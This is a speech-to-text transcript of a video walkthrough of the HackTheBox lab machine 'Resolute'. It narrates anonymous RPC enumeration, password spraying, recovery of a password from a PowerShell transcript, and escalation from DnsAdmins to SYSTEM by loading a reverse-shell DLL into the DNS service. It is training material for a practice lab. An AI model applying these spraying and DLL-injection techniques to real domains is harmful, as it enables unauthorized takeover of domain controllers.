HackTheBox - Resolute

Key Takeaways

what's going on YouTube this is ipsec I'm doing Resolute from hack the box and I really like this box because it's a medium level box that is definitely relatively easy as long as you keep looking at what stands out and also the actual final path is really cool I like the escalation from DNS admin to system that being said the one thing I didn't like about the box is showing the ramification if you're lazy when you do that final step because a lot of people just use msf Venom to create a dll it didn't have that reverse shell Fork out a connection and when you do this DNS injection this way you're gonna crash the DNS server and if you crash DNS in a production environment you're gonna have a bad time so it kind of gave a lot of people a false training of saying oh when I'm a member of this group I do this and I get admin they didn't really see oh if I did it this way I get admin but I crash the environment so at the end of the video we will show how to create a um exploit and more of an opsec safe manner by creating a thread to send the reverse shell so the program can just resume normal operation so with that being said let's begin and the first thing you'll notice is my terminals a little bit different this information is automatically populated at my bash prompt this is the hack the Box server I'm connected to if I switch to like a pro lab it would have the prolab information here here's my hack the Box IP and then the username of my box and the current working directory of my path and we have where I begin my input here and the reason for the change is I was just upgrading Cali and the upgrade really did not like it and it just wouldn't boot anymore I decided to try something new and switch to Parrot because that's what hack the box is officially supporting with their pone box which is just a customized version of parrot that runs in a web browser I kind of took all the customizations and just applied it to a vanilla install of the parrot security mate ISO and when I get some time I'll document that um customization process so you all can have the same exact thing but for now I mean everything's pretty much the same all the commands I run here will most likely work on your Cali machine so with all that being said let's just begin with our end map that is Dash SC for default scripts SV enumerate versions oh a output all formats put in the nmap directory and call it Resolute and then the IP address which is 10 10 10 169. this can take some time to run so I've already ran it looking at the results we have a handful of ports open the very first thing we have is DNS on Port 53 then we have kerbros on Port 88 Microsoft Remote procedural column 135 and 139 ldap on put 389 and at this point I am starting to think it's some type of Windows domain controller just based upon all these ports we also have SMB on 445 and a bunch of other things going down here we can get some information about the Box the computer name is Resolute and it looks like it got that from the SMB OS Discovery script and then we also have the domain name as megabank.local and the fqdn as resolute.makeabank.local so let's go take a look at the host file so let's edit Etsy host and we will add 10 10 10 169 and let's add all these names uh that should be fine save this file and all that did was let us ping it by hostname eventually this may become useful because some things like Powershell remoting and stuff really like having the hostname so it always helps to have that configured we could have also probably edited our um resolve.com file and put a name server as 10 10 10 169 so it always went to that server for DNS um before we go look at other things let's just start a full port scan so Dash p dash does all ports I think that's one through 65 535 or some insane number uh let's do nmap Resolute Dash all puts 10 10 10 169 and I'm also going to throw a dash V flag so I can see open ports as it finds it I'm just going to open up a new pane here so nmap stays at the bottom here and when it finishes it'll just say bash so handy little tip there um let's go take a look at open shares so I'm going to do SMB client Dash capital l 10 10 10 169. hit enter and we get Anonymous login is successful but we don't have any shares I was half expecting to see like a sis Vault share or something since it's a Windows domain controller we can try like uh null authentication and nothing really happens there um we can try switching up the tools and using SMB map and I think it's just Dash Capital H 10 10 10 169 to see if this sees anything different doesn't get anything does resolve the hostname to resolute.megabank.local uh we can also try our PC client so 10 10 10 169 and then it just hit enter for the password we get login failure we can try null authentication again which is just not specifying a user and it actually authenticates us and this is just a old setting and a lot of Windows domains I think the anonymous user has to be in like the pre-windows 2003 compatibility group or something weird like that um essentially when you upgrade a domain controller this thing may be set I don't think it's set if you just installed Windows 2016 or 2019 vanilla but I think if you added the anonymous users to that compatibility group then this would work um the reason being it's just a old default insecure setting but some applications actually require this setting to work so when you upgrade domain controllers Microsoft just didn't change that setting because it may break applications because yeah anyways let's just go begin and there's a bunch of commands we can run here if you want to know more about RPC client you you can go to um ipsec.rocks and then just search RPC client and you'll get a list of things but let's just do a new Dom users to dump a list of domain users and we can copy this to a text file so I'm just going to do a new pane V users paste and we can do um cat users pipe it.org Dash f print one uh print two and let's just do another awk Dash F and there's probably a better way to um sort this file out I'm just using ALC because that's my go-to I'm going to pipe this to Temp because if I pipe this to the exact file I am cutting it will go to a blank file so I can show that real quick so I cut a temp if I cat users again and then direct this to users itself uh something weird happens and it empties out the file so move temp to users and now we just have a user list um there's other things we could do like if we did query user and specified like Steve it will give us more detailed information I think there's also a flag that can get like the password policy but generally to do password policy I just use crap map exec and I think it's uh SMB then the dash dash pass Paul 10 10 10 169. see if this works see yep there we go and we can see the minimum password length is seven and compass for complexity not required the main thing I'm looking for is some type of lockout policy reset account uh account lockout threshold none so seeing this means we can Brute Force accounts without fear of locking them out and also if we did lock them out we know there is a um counter for 30 minutes it would unlock so knowing both of those is always handy before it's starting any type of Brute Force um there's other things you can query like uh query display info we'll kind of do this query user thing and pull a lot of the um popular fields and just show them all uh query disk info there it is so this is showing the description for the account uh I think this is Sam account name uh the U full name of the user and looking at this we can see Marco was created and password sent to welcome one two three so I'm just going to take a note of this I don't think I have cherry tree installed so I'm just doing it in a um text file I don't actually know what disp info 2 is uh let's see three this info three does this show anything different uh can we do help query disp info 3. h I'm not exactly sure what the difference between uh the display infos but we got this password so let's try it out exiting RPC client we can do crack map exec SMB 10 10 10 169 Dash U of what was the password oh well what do I do here exit I forgot I was in a zoomed session there we go let's go Caton notes and it is going to be Marco and the password was welcome one two three Bang and we get a login failure we can just specify a text file instead of a username and it's going to try this password for every single user and I'm mainly doing this because well if they set one user to welcome one two three bang that sounds like a default thing they may set new accounts and we can see we get one hint uh one hit which is the Melanie user going back over to our end map we can see this is not finished yet um there is a Windows Powershell remoting Port that is I think 5985 and 59.86 I'm just going to specify those two ports because I care about them right now and the reason why I'm doing this is because [Music] um we had a hit but it doesn't say pwned next to it which means uh we can get a shell so the only thing we could really do with this is probably um SMB map I think Dash D for domain megabank.local Dash U Melanie Dash p for password welcome one two three bang and always put the password in quotes because it may have special characters that just get um treated weirdly so I just had a habit I always put password in single quotes and trying her account let's see if we get anything oh we can now see the CIS wall share so we could look at some good policy stuff but C and admin we don't have access to if we had access to any of these or write access crack map exact would probably say pound next to it there are other modules in crack MacBook exec such as winrm that's going to test all this for us and we could have specified Melanie as the user to speed it up a little bit but I just wanted to show you it goes through all of them and then when it hits Melanie if she has the ability to do windows remoting it will let us know by saying it has pwned that account so letting this finish any minute now it's probably this one come on crack map there we go so we can see pound here um you can also do Dash X for execute command so Melanie to speed it up we can do the command who am I and you could also just do one-liner so you combine this with like a Cobalt strike Beacon or Empire Beacon so whenever crack map exec gets a um hit it runs the command uh we could also do like qmi slash all to see the output and prove it's actually running on this server since technically I mean it knew the domain knew the user so it could just bake us out and print that information but adding this slash off lag will show us everything about this and here is that group that I bet Anonymous users is a member of that pre Windows 2000 compatible access group but we have code execution um I'm going to use EVO winrm to get a shell on the box because I just like using this tool I could probably do um Powershell and nops session or something but Powershell on Linux is flaky when doing anything remote so that's why I still default to evil winrm so Dash U for user Melanie and Dash p for password welcome one two three bang and I think it's Dash H or maybe Dash I for IP I always get this flag wrong uh easy check we can just do evil winrm Dash h and dash i4ip so running this and we can just clear out this needless session but we get a shell as Melanie and if you're having trouble with um running evil win RM if it's not a commander you gain dependency issues I install it with gem so it's just uh gem install evil Dash winrm so a little helpful hint there if you want to install this uh generally the first thing I always do to test prevask is run winpies and we're going to do that but I want to do something before that because there was a big Twitter post that said seat belt the um one of the old tools for prevask had a major update so I haven't actually ran that yet so let's run this and um see what's really changed because if you look at this you can see everything with the plus I think is new as of like two days ago so amsi antivirus Auto runs audit policy dnscash.net stuff explore it's just been massively rehauled so let's go take a look at this tool um they don't provide the compiled binaries which is probably smart you should never really just run public compound binaries of things that you can compile yourself uh because number one it has a lot of just forensic artifacts that AVS May pick up on and number two you may not know exactly what's in it so let's just compile seat belt uh let's go to the GitHub directory seat belt and open with Visual Studio and while that opens let's go back to Parrot and we need to probably make a tools directory in this thing and if config eat zero and then let's do SMB uh M packet SMB server and what is the commands Dash SMB to support Dash user ipsec Dash password ipsec and then the share name which will just be I guess tools and then the working directory to share out which I just do PWD to do my current working directory uh permission died need do that in sudo and um exclamation exclamation point is going to run the whole last command so if I did Echo test if I do this it's going to run that command again um so when I did sudo or Echo who am I this one might be better and then sudo uh uh I don't know why I did the echo command I can just do who am I double thing and then pseudo like this so that's gonna run sudo who am I it didn't work before because this was um exiting the pseudo call and then running it the reason why I had done this is because of the second thing I want to show you um there is a dollar Bang or wait thought that was it uh Echo who am I Echo maybe dollar underscore and that's going to I think pull the last argument Echo test test test oh we should do test one test two test three so that's going to pull the very last argument dollar underscore and then I want to say dollar bang did something uh Echo that does something anyways you can kind of get these things um if you want to know more of that stuff I think if you just search Egypt uh bash tricks is there a talk uh command line Kung Fu by Egypt he did a talk I think it was Defcon that he did a talk on this uh let's see bash tips no well that's a book that's definitely not it let's see Yo Egypt one-liners I think yeah this is a good talk um one line is to rule them all so Egypt one-liners to rule them all Defcon 26 to Egypt and view so if you want to know more of those little tricks I'd recommend that video but back to this uh where was I we were running in packet and opening up visual studio over here and we have seat belt so I'm just going to change to release and build solution and then we can go in seat belt bin release and grab this uh 172 16 10 209 is my IP address I believe oh no that's not it uh that is it it's trying to use the user test so let's just do the user test there we go test ipsec [Music] what let's try test test I don't know exactly what's going on there multiple connections to a server by the same user using more than disconnect all previous sessions I'm just going to reboot my windows box so I'm gonna pause the video and resume once this finishes rebooting the box has just finished rebooting so let's try this uh test test path does not exist oh we called it tools there we go so let's go in the tools directory and we can access this C colon users ipsec and we can copy seat belt to this directory and then we can go back to our shell and do upload tools seatbelt.exe and this should upload it this is a evil winrm thing I have expected to see progress okay there we go I just took a second to start uploading and once this is done we should be able to run seat belt so let's do upload successful dot slash seatbelt.exe uh it's not a valid application for this OS platform file tools seat belt weird um CD tools python3 Dash m INE HTTP server on Port 80. sudo that's gonna take me a while to get used to let's try curl 10 10 14. 2 I think it's capital s seatbelt.exe I'm wondering if maybe there's just some uh issue with the way it uploaded and evil win RM so dot slash seatbelt.exe and that looks better we don't get any response back this is probably a microsoft.net thing now so let's do um CD backslash windows microsoft.net framework 64. I'm just going to do dir I think that's the path so we can see 4.030319 .net let's see I'm guessing this is going to be like version 4.5 uh let's see not sure exactly what version this is let's just change a compile path so generally when dot net doesn't work I changed the framework to either B4 or four or five I think this is going to be four yep okay so now we can rebuild the solution and copy test test tools copy seat belt over to a Cali box uh a parrot box my bad old habits DieHard so we can now run this version of seatbelt and see if we get anything different it's downloading taking it sweet time dot slash seatbelt.exe and that's looking better so we have arguments we want to run so let's do Dash group equals all I just pulled that from here to run all enumeration Scripts can be confined with Dash full I guess we probably should have done both of those but let's just see what happens so it looks like it's running seat belt and this could take a little bit so I'm going to pause the video and we'll just resume when it's done it's now finished and we can see it took 98 seconds I love when these tools have the actual time at the very end but let's just go look at seatbelt.exe and go see everything this checks so we have amsi uh I'm not sure if this means it's running I'm not sure the purpose of this but there it is antivirus can't enumerate because the namespace is not available trying to enumerate app locker but we get an access denied probably not done doable from a user up table a bunch of audit stuff uh Auto runs uh Chrome histories Cloud credentials credenum credit card stuff uh maybe this is a directory or maybe directories that a user can write to I'm not exactly sure what this is trying to tell us dnscash.net so we have version 4601586 so I guess this just couldn't execute.net 3.5 for whatever reason uh we have amsi is disabled.net for amsi is disabled master keys environment path environment variables uh explicit login events to this box so this is definitely handy to identify if like a box is being used or not so I love seeing logon events run commands file info some Firefox checks how long the box has been idle for so this is probably when I reverted the Box I.E stuff installed products interesting files I'm not sure what it uses to determine interesting file uh let's see interesting process it was trying to list process but it looks like it got access denied internet settings lapse this is going to be a local account policies or local administrator policy it's essentially something to randomize the local administrator account for workstations so you can't do past the hash with a workstation admin account uh the last shutdown so this is probably when the box was created or maybe tested on hack the box I don't know but December 4th 2019 about a year and a half ago oh local gpos local groups and this is just showing group stuff users so who's a member of Administrators a bunch of default stuff let's see that's odac we have a DNS admin and we have mega Bank slash contractors and this is non-default you'll notice a lot of Windows default things their Sid ends in like a 500. this is above 1000 so this isn't default so the DNS admins are the Box Creator did something unique to this group so that's probably going to be interesting so V notes and we can say DNS admin has contractors and we can also take this a step further and do RPC client Dash U and 10 10 10 169 we could also just do um like who am I and on the reverse shell into it but that's not interesting I always like doing things remotely because if I did commands on this session my remote session there's a chance it may be logged through like command line logging or things like that however if I have access to a numerate active directory from my Cali box there's no way command line logging would detect anything because this is my box so always like being able to do it through things like RPC client or ldap the new Dom groups is going to list all the groups on this box and there is this contractors and we can do query group and then if we just did uh contractors I don't think this works I think you have to use the rid which is 0x44f and this is just going to explain uh display information about the group you can do query group mem which stands for members and this will show the member of the group and that is our ID 451. so if you did the new Dom users you would see all the rids you'd see Ryan is our ID 0 uh 0x451 or you could just do query user 0x451 and that will tell you it is Ryan so something unique happened to this box to add Ryan to the DNS uh group so that's interesting uh local users maybe this would have showed us that log on events LSA settings mapped drives named pipes Network profiles Network shares ntlm settings this displays a lot of information now OS info Outlook power on events uh we have a bunch of Powershell stuff so we have version two installed which can bypass all logging version 5 installed we have a log directory which is C colon backslash PS transcripts so let's take a look at that and see amsi is also disabled printers processes process owners uh putty Keys remote desktop stuff recycle bin registry security packages Services um checking if sys mods installed slack stuff this definitely collects a lot of useful information maybe not useful information for prevask because I mean slack Firefox Chrome but on a natural engagement I could definitely see big uses for this we also have wsus settings wmi filters but that is quite a bit information this queried in a minute and a half but let's go take a look at um the other tool which is winpies to see what this found so the main thing I want to see is probably the DNS admin group and or the contractors group that's a member of DNS admins and I also wanted to see the Powershell history so these are two things I'm making sure win PCS so opt Pro is escalation awesome script I'm just going to do find and we'll grab for when peas.exe and then we can copy this and hdb resolute tools and we can just do curl 10 10 14 Tool uh I think I said Tool uh 10 10 14 2. uh when PS dot exe Dash o one piece.exe and curl is just a Powershell five thing I think maybe it's four but um you could also do like um new object net.web client dot uh download file hdb 10 10 14 2 winpies.exe and then I'll just call it test.exe so that's another way you can download files there's just a bunch of ways you can do it in Powershell uh I'm not sure exactly what the exception is new object net.web client maybe this is removed or disabled but curl is a lot less a thing to type so that's why I use Curl um I don't think the extension matters not sure exactly what it's airing but let's just move on and do when peas.exe and we can see what this finds and I don't think this one's going to tell us how long it took however the colors are super nice I wish there was kind of a combined version of seat belt and win peas that had colors but I don't think that exists so pause the video again and let this run and then we'll come back to it it's now finished and I think it took a little less time but not that much so I'm just going to search back for when peas and we will take a look at everything this finds so we got system information and right at the very top we have Powershell settings so it checks both versions and also this C colon PS transcript directory um audit settings Windows Event forwarding lapse credential good cash creds environment variables AV information UAC so this looks like it's doing a pretty good job at catching everything seat belt did except I think it displays it a bit better that being said always run both tools because I don't think this is doing all like that Chrome putty um deep Pappy Keys Etc uh we have password policy that shows password length I think that may be wrong I think it was seven so I don't know exactly what that is I got some type of error message uh bunch of stuff modifiable Services I didn't see anything in red I'm going through this quicker than seatbelt because this is colored and I know colors stick out and those are things I should definitely look for oh this looks like it does fine deep happy master keys foreign so not too much there um the main thing we want to look for is um let's see contractor so seat belt detected contractor uh contractor was never displayed and the winp stuff that may be a flag we just missed or maybe it just doesn't look for things like that being said let's just move on and go to that c colon um PS transcript directory so do a dir you don't see anything GCI which is um get Dash child items it's just shorthand I think it's like this come on return maybe it's get child item pwsh get child item yeah get child item is what it is so get child item is just the long notation of GCI it's got a dash hidden flag which shows hidden files and folders so we can see doing it again with Dash hidden we see recycle bin documented settings program data this PS transcript directory recovery uh system volume information we just get a lot more information with Dash hidden so let's go into PS transcripts GCI hidden we got 2019 1203 and if we remember like the last shutdown time uh let's see is that here uh 12 for 2019. so this Powershell transcript history was one day before the shutdown so chances are that's when this machine was created so having a little forensic time like that a forensic timeline like that is always helpful so let's do GCI Dash hidden again and we have this Powershell transcript so I'm just going to do GC for get content and then we can copy this and paste and GC space and let's just go down through this transcript so we can see the user that ran this uh invoke expression doing Dash join PS doing something and we can see the start of a Powershell uh a shell and now running the command invoke expression command and doing CMD C Net use x colon backslash backslash fs01 backups Ryan and a password so let's go copy this add this in the notes and we probably just want to copy that um and just going down looks like we get standard out here saying the syntax is wrong for that command and that's the end of the transcript so we can check that password that account with again crack map exec let's just do I guess SMB since that's what's there Ryan Dash p and see what this says foreign looks like it got a shell right away I was actually not expecting that um let's do does dash X work here I'm not sure if it works on the SMB module let's do in packet PS exec do I not happy yes exact okay PS exact dot pi uh Ryan at 10 10 10 169. paste the password I'm honestly not sure why it says a pound there is there a dash dash shares module so I'm hoping this will list what crack map exact thinks the shares are see read read doesn't say right so I'm not sure exactly what's going on here but we definitely don't have um access to do that we could look at when RM and when our M will probably correctly say pound if it doesn't say pound I'll just be really confused um winner M doesn't support this dash dash shares so let's just get rid of that and let's see this nmap command with Dash p dash is still running it's saying only like 30 done so that's why I don't always do that Dash p dash so when RM works as well let's clean this up a little bit I got my shelves everywhere and I don't like having shelves everywhere so let's see let's create a new pane and I'm going to send this to pain I think three what send two three can't join I don't know why my send painting isn't working weird I did the same thing on that window foreign I don't know what I was doing but that worked so this is going to be servers this is shell Melanie and this will be shell Brian so just a way to stay organized Evo win RM Ryan Dash p don't have that password saved but it is right here dash i 10 10 10 169 and you'd be surprised with how much more efficient you'll be if you start um every now and then just taking a few seconds to clean up how your windows are organized so this is generally my recon at one two this is gonna be where I run all my services like HTTP SMB this is a low crib shell this is a high-priv shell or a different shell so this user was a member of the DNS admin group and let's see DNS or maybe I need to uh oh I buy Hydro Capital One member of Mega Bank DNS admins and early in the video we found out this contractors group was a member of this and this is a special group if we go um Google this DNS admins privilege escalation you can read a bunch of posts about um how this group can be used to load a dll off a network path and then get code execution so they're using msf Venom here and this works I don't exactly like this um we're gonna do it both ways but this can actually hang the DNS server I believe so always be careful when doing this so let's go into tools uh actually let's do exploits and let's see shell reverse TCP this should be fine just need to change the IP 10 10 14 2. L port to be 9001 and I'm just going to call this rev.dll instead of prevask see if this generates file rev.dll okay and I just always like doing file against it to make sure it's what I expect um it may be in a different format like if it's raw it'll just say like text or something so let's do rev2 um let's go back to servers and we'll do impact it SMB server Dash oh we're not going to do user and password because I want to make this accessible to Anonymous users if I did user and password we could have some type of weird issue so it's gonna be Please Subscribe as the share name and then we'll do PWD here but I did not go into the exploits directory so I want to do that before running this and packet thing so there is I think one important thing if we went to actually get the um I guess user.tax to root.txt and that is note and it says due to a change freeze any system changes will be automatically reverted within one minute so whatever we're doing here we have to be fast because the system's reverting things every minute so if we scroll down this is going into how we host it with SMB server um DNS CMD and I don't know if we need this fqdn because we are doing it um locally let's see uh what is it LOL bins let's see because DNS CMD is also here okay I think we may need the path so let's go back to a reverse shell DNS CMD was it megabank.local and then a shell was called rev.dll and remember a minute ago or two minutes we did Dash F raw and you can just see it says data so if it ever does the wrong format you can end up debugging it for quite a while so that's why I just like checking it right away so rev.dll and we called it I think exploit uh we call it please subscribe and then the IP which is 10 10 14 2. that looks good start a listener in 9001 does not look like it worked let's try 127001 do we do it with an IP okay sc.exe stop DNS and then we can do start DNS to restart the DNS service and we get a reverse shell as system however we do NS lookup resolute 127001 we're gonna hang because we just crashed well the DNS server never fully starts um if we exit the session it should finish and work or maybe we just hosed it and we have to wait that full minute for it to be reverted let's try it again there it works so we can do everything again to show again this is definitely causing an issue start and we do this NS lookup doesn't work as soon as we exit the shell we should get a response in three two one nope but we're definitely causing some type of system issue and the reason is when you do dll injection you're kind of hijacking the execution path so the DNS service is starting up and that's going to load that dll and that dll isn't forking or setting a thread it's just doing that reverse shell and it doesn't continue progress until the reverse shell dies so um also if like the virtual doesn't return the return code this thing is expecting it may just not start the service it may just stop right there so the solution to be able to do this without hanging the DNS server is to in Windows create a thread and then run the verse shell and that thread so the DNS server resumes normal operations and also I think um this is just um attaching on like or executing code on the dll attach command and to do dll injection I guess properly you should inject exactly on the function that's being called so I'm going to see if I can find this post real quick uh DNS exe persistence one of these posts will say the function run dll 32 so it's running this DNS plug-in initialize function and essentially this is both a lateral movement and a privileged escalation because you can remotely add a plug-in to the DNS server to execute code only the DNS admins can do it but typically DNS admins are just expected to edit the DNS things like say oh this host is no longer at this IP address it's now this IP address things like that you don't expect them to upload a malicious plugin to get code execution it's a lot like saying you have a malicious or you have a WordPress server on a website you give someone administrative rights to WordPress but you don't give them administrative rights to the box that WordPress is running on however because their admin on WordPress they can upload a malicious plugin that executes code on that underlying server giving them a shell so you didn't give them the right to get that but you gave them a right that allows them to get it essentially so again this is is just allowing DNS admins to execute code on the domain controller is something they typically can't do and generally when you execute code on domain controller you're pretty much just Global admin at that point so that's what this is doing and we're going to use it as a as a privileged escalation but keep in mind if you have this group and you own like a workstation you can just install this DNS CMD command and then have the domain controller load your plugin remotely and then when DNS restarts you get a show on that box so with all that being said I'd highly recommend reading this whole post because it's going to go into it in a bit more detail but we're just going to do the exploit so I'm going to go grab this DNS exe persistence code so let's open up command prompt GitHub or desktop GitHub get clone and go in here well we don't really want to go in there we just want to open up visual studio tools oh not tools GitHub DNS exe persistence open this up with Visual Studio and it asked me to upgrade yeah the platform tool set that should be fine and we can see the code and oh God what language is this in yeah I'll be fine so um interpreter is probably putting well not much msf Venom's probably putting the code here which is fine it'll probably execute whenever the dll does the process attach call but the correct place to do it is this DNS plug-in initialize stage because that is what the DNS server is asking for so let's add code here and what we have to do is um get a reverse shell we could just have it execute a file with system and be lazy but let's do this all within C so I'm just going to search for C plus plus reverse shell and let's see go the first two and see what these are foreign looking for one that's lazy that just has everything in Maine so let's grab all of this grab the includes too and I'm going to create a new item C plus plus file I should rename that that's not source.cpp let's call this rev shell okay our IP address we're gonna do 10 10 14 2 0.9001 and I'm going to change this from it main because this is no longer the start of the program we want to call this as just a function and we also want to call this as a thread so this will be rev shell and we also have to change this from int to d word win API and then we're going to eventually pass this a pointer so let's do LP parameter that looks fine the next step we have to do is create the header file so let's add new item header we can call this Rev shell.h paste that in and then in this all we should have to do is include Rev shell.h and um let's see let's define our handle then we can do uh thread ID and create the thread so create thread security attributes thread attributes function rev shell parameters creation flags and the ID so this should um create a thread which is essentially like a fork and run a reverse Shell Code so essentially it says do reverse shell while continuing the program if we just did the like um we just did rev shell we'd have the same issue as uh before where it just hangs there so let's change it to release and pray that it builds are you building uh let's see unexpected end of file with this maybe we have to return zero maybe let's return something and we may have to add that declaration include stdafx.h s t d a f x foreign build okay rebuild was successful so let's go see colon users DNS exe persistence release and let's see 9 11. copy that um we're actually going to have an issue right now because this Windows is configured to not do any guest authentication to SMB so if I try to go this it says we can't access it so let's quickly switch back to our VM go to the servers tab and we can do SMB to support user test password test and we can change this to be tools okay tools awesome copy and we'll call this one um Rev thread.dll and there's probably a msf Venom flag or something to generate something that does in a thread or something seriously I don't use msf Venom all that much so let's see that please subscribe is done let's listen and it was Rev thread.dll command successful stop DNS start DNS hopefully get our shell we do and DNS is working um is it time Echo date I don't think I want date okay that works so let's see I want to do this right at the start so it's been a minute it should be restarted I just want to go for good measure and make sure this works so rev thread stop first start I probably wasted over a minute now foreign date yeah 30 seconds so you can see DNS is working so let's try it one last time and this time we will try it with rev.dll actually let's do it with um all the changes removed so I just edited way too much edit what's the redo hotkey uh Ctrl y it Main see IP port so this can be int crab shell like that uh we can return zero that looks fine let's go to our header this no longer has any parameters okay and let's go to the project we just do rev shell so let's see what happens with this rebuild the solution we need to include foreign afx.h oh God we screwed something up sometimes I know I've said this before I really hate when I go outside my comfort zone let's see it rev shell I wonder if we just didn't copy something see let's simplify this delete delete uh yeah refshow.h go here and we will go back to our reverse Shell Code copy the includes delete that include 10 10 14. 2 9001 and we can just copy this code definitely not as clean but at least this should compile without me having to debug this rebuilt awesome we have to go back to parrot switch or server copy this and let's just rename it to Rev 2.dll sometimes I'm not creative so up the other share date oh let's wait till a new minute 45 okay so now we should be good let's do Rev 2.dll then stop DNS start DNS and NS lookup you can see it's obviously not working because we did not thread it so that will be the video hope you guys enjoyed it take care and I will see you all next week